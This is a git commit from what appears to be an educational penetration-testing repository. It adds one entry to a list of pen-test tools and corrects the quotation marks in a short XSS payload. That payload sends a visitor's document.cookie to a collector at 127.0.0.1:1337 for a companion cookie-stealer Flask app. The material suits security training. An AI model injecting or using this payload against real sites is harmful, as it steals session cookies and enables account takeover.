This commit is contained in:
Omar Santos 2021-03-27 19:44:44 -04:00
commit 149aa8d305
2 changed files with 3 additions and 2 deletions

View File

@ -2,6 +2,7 @@
The following are a collection of recently-released pen test tools. I update this list every time that there is a new post and when I find a new one around the Internet. The rest of the repository has hundreds of additional cybersecurity and pen test tools.
----
- [Search-That-Hash - Searches Hash APIs To Crack Your Hash Quickly, If Hash Is Not Found Automatically Pipes Into HashCat](http://feedproxy.google.com/~r/PentestTools/~3/yodgPu0QuJI/search-that-hash-searches-hash-apis-to.html)
- [Obfuscation_Detection - Collection Of Scripts To Pinpoint Obfuscated Code](http://feedproxy.google.com/~r/PentestTools/~3/UGycr92EPpQ/obfuscationdetection-collection-of.html)
- [cve_manager_VS - A Collection Of Python Apps And Shell Scripts To Email An Xlsx Spreadsheet Of New Vulnerabilities In The NIST CVE Database And Their Associated Products On A Daily Schedule](http://feedproxy.google.com/~r/PentestTools/~3/AW1ePPa2tPE/cvemanagervs-collection-of-python-apps.html)
- [Retoolkit - Reverse Engineer's Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/Yf4NMRTsBbg/retoolkit-reverse-engineers-toolkit.html)

View File

@ -2,5 +2,5 @@
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
```
<script type=“text/javascript”>document.location=http://127.0.0.1:1337/?c=+document.cookie;</script>
```
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>
```